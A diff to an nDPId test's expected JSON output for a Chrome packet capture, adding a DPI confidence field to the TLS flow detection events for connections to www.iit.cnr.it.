+00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902508740,"flow_last_seen":1620902508740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1620902508740,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620902508740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1620902508740,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuKAbtgbcSnAAAAALAC\/\/+8\/wAAAgQFtAEDAwUBAQgKM3SVkQAAAAAEAgAA"}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620902508769,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4peZebaYG3EqKAS\/og23AAAAgQFrAQCCAo6mxi5M3SVkQEDAwc="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620902508769,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuKAbtgbcSoXmXm24AQECxT5gAAAQEICjN0lag6mxi5"}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509272,"flow_last_seen":1620902509272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1620902509272,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1620902509272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1620902509272,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuYAbvjd2YSAAAAALAC\/\/+WlQAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509273,"flow_last_seen":1620902509273,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1620902509273,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -27,20 +27,20 @@
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuaAbt39JnGf4gLD4AQECwd3QAAAQEICjN0l5M6mxrM"}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620902509303,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5sh1fPg5uH4xaAS\/oinwwAAAgQFrAQCCAo6mxrPM3SXewEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620902509303,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvubAbvm4fjFIdXz4YAQECzEywAAAQEICjN0l5Q6mxrP"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00642{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00643{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00642{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00642{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00643{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00644{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
